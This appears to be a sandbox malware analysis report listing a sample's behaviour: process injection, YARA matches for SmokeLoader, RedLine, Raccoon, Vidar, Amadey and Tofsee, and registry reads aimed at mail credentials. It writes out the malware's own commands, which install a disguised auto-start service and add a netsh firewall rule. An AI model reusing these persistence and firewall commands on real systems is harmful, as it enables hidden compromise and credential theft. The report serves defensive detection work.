Source: C:\Users\user\AppData\Roaming\uufaeea	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe

Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 320000 protect: page execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Memory written: C:\Users\user\Desktop\U3E7zMaux2.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Memory written: C:\Users\user\AppData\Local\Temp\8EC4.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 320000 value starts with: 4D5A

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\user\Desktop\U3E7zMaux2.exe

Code function: 0_2_00530110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,

0_2_00530110

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Thread created: C:\Windows\explorer.exe EIP: 44E1930	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uufaeea	Thread created: unknown EIP: 4F81930	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Thread created: unknown EIP: 5C81930	Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 320000
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 557008

.NET source code references suspicious native API functions

Show sources

Source: 8EC4.exe.7.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 8EC4.exe.7.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 22.0.8EC4.exe.fa0000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 22.0.8EC4.exe.fa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 22.2.8EC4.exe.fa0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 22.2.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 22.0.8EC4.exe.fa0000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 22.0.8EC4.exe.fa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 22.0.8EC4.exe.fa0000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 22.0.8EC4.exe.fa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 22.0.8EC4.exe.fa0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 22.0.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 40.0.8EC4.exe.400000.10.unpack, NativeHelper.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 40.0.8EC4.exe.610000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 40.0.8EC4.exe.610000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 40.0.8EC4.exe.400000.6.unpack, NativeHelper.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 40.0.8EC4.exe.400000.8.unpack, NativeHelper.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 40.0.8EC4.exe.610000.9.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 40.0.8EC4.exe.610000.9.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 40.2.8EC4.exe.610000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 40.2.8EC4.exe.610000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 40.0.8EC4.exe.610000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 40.0.8EC4.exe.610000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')

Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Process created: C:\Users\user\Desktop\U3E7zMaux2.exe "C:\Users\user\Desktop\U3E7zMaux2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uufaeea	Process created: C:\Users\user\AppData\Roaming\uufaeea C:\Users\user\AppData\Roaming\uufaeea	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5756 -ip 5756	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 520	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Process created: C:\Users\user\AppData\Local\Temp\E666.exe C:\Users\user\AppData\Local\Temp\E666.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\shayesoq\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description shayesoq "wifi internet conection	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start shayesoq	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process created: C:\Users\user\AppData\Local\Temp\8EC4.exe C:\Users\user\AppData\Local\Temp\8EC4.exe	Jump to behavior
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe

Source: C:\Users\user\AppData\Local\Temp\86C4.exe

Code function: 21_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

21_2_00406EDD

Source: C:\Users\user\AppData\Local\Temp\86C4.exe

Code function: 21_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,

21_2_00407809

Source: explorer.exe, 00000007.00000000.699536382.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.682849926.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.671538738.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000007.00000000.683142631.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.671690144.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.699823056.0000000001080000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.765182973.0000000000E30000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.759232501.0000000000E30000.00000002.00020000.sdmp, 7801.exe, 0000002B.00000002.1009587060.0000000003790000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000000.683142631.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.689795661.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.671690144.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.699823056.0000000001080000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.765182973.0000000000E30000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.759232501.0000000000E30000.00000002.00020000.sdmp, 7801.exe, 0000002B.00000002.1009587060.0000000003790000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.683142631.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.671690144.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.699823056.0000000001080000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.765182973.0000000000E30000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.759232501.0000000000E30000.00000002.00020000.sdmp, 7801.exe, 0000002B.00000002.1009587060.0000000003790000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.683142631.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.671690144.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.699823056.0000000001080000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.765182973.0000000000E30000.00000002.00020000.sdmp, D984.exe, 0000000E.00000000.759232501.0000000000E30000.00000002.00020000.sdmp, 7801.exe, 0000002B.00000002.1009587060.0000000003790000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000000.676243228.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.692994806.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.706560569.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: SetComputerNameW,EnumSystemLocalesW,GetConsoleAliasesA,FindResourceExA,GetVersionExA,VirtualQuery,CreateThread,SetComputerNameExW,_printf,_malloc,_calloc,__wfopen_s,_fseek,GetConsoleAliasA,GetModuleHandleA,LocalAlloc,GetConsoleTitleA,GetConsoleTitleA,GetConsoleTitleA,GetAtomNameA,CreateIoCompletionPort,GetFileAttributesW,GetDefaultCommConfigW,	0_2_004017B8
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: GetLocaleInfoA,	0_2_0041097C
Source: C:\Users\user\AppData\Local\Temp\D984.exe	Code function: GetLocaleInfoA,	14_2_00410857
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,	20_2_0040AE00

Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\8EC4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\8EC4.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\U3E7zMaux2.exe

Code function: 0_2_00408ECC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00408ECC

Source: C:\Users\user\AppData\Local\Temp\7CA1.exe

Code function: 20_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

20_2_0040AD40

Source: C:\Users\user\AppData\Local\Temp\7CA1.exe

Code function: 20_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

20_2_0040ACA0

Source: C:\Users\user\AppData\Local\Temp\86C4.exe

Code function: 21_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,

21_2_0040405E

Source: C:\Users\user\Desktop\U3E7zMaux2.exe

Code function: 0_2_004017B8 SetComputerNameW,EnumSystemLocalesW,GetConsoleAliasesA,FindResourceExA,GetVersionExA,VirtualQuery,CreateThread,SetComputerNameExW,_printf,_malloc,_calloc,__wfopen_s,_fseek,GetConsoleAliasA,GetModuleHandleA,LocalAlloc,GetConsoleTitleA,GetConsoleTitleA,GetConsoleTitleA,GetAtomNameA,CreateIoCompletionPort,GetFileAttributesW,GetDefaultCommConfigW,

0_2_004017B8

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: C:\Users\user\AppData\Local\Temp\86C4.exe

Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

Modifies the windows firewall

Show sources

Source: C:\Users\user\AppData\Local\Temp\86C4.exe

Stealing of Sensitive Information:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 40.0.8EC4.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.0.8EC4.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.0.8EC4.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.8EC4.exe.451f910.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.8EC4.exe.451f910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.0.8EC4.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.2.8EC4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 40.0.8EC4.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000028.00000002.923336327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.828481056.0000000004401000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.820733997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.819245011.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.820186557.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.819693926.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Amadeys stealer DLL

Show sources

Source: Yara match	File source: 0000002C.00000002.861387374.0000000000580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000003.862648627.00000000005E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.851523322.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.922320666.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.861216810.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.922065268.0000000000400000.00000040.00020000.sdmp, type: MEMORY

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 11.2.uufaeea.4615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.E666.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.U3E7zMaux2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.E666.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.E666.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U3E7zMaux2.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.U3E7zMaux2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.1.E666.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.U3E7zMaux2.exe.5315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U3E7zMaux2.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.E666.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.uufaeea.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.E666.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.U3E7zMaux2.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.uufaeea.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.784101177.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.700489251.00000000044E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.713149753.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.783879616.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.713456716.0000000002301000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.766896131.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.766831607.00000000004F0000.00000004.00000001.sdmp, type: MEMORY

Yara detected Amadey bot

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000030.00000002.940319035.00000000007A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.942563144.00000000007CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.943525106.00000000007D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.934963218.0000000000751000.00000004.00000001.sdmp, type: MEMORY

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 43.2.7801.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.7801.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.3.7801.exe.4e00000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.3.7801.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002B.00000003.856737411.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.922477314.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7801.exe PID: 7032, type: MEMORYSTR

Yara detected Vidar stealer

Show sources

Source: Yara match

File source: 00000014.00000002.775878501.0000000000622000.00000004.00000020.sdmp, type: MEMORY

Yara detected Tofsee

Show sources

Source: Yara match	File source: 21.2.86C4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.lagavljy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.86C4.exe.540e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.lagavljy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.lagavljy.exe.650000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.lagavljy.exe.650000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.lagavljy.exe.490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.svchost.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.86C4.exe.560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.86C4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.lagavljy.exe.470e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.806559980.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.797378726.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.807575070.0000000000650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.807182784.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.780018628.0000000000560000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.803811514.0000000000490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 86C4.exe PID: 1368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lagavljy.exe PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5940, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Show sources

Source: C:\Users\user\AppData\Local\Temp\7801.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Source: C:\Users\user\AppData\Local\Temp\7801.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

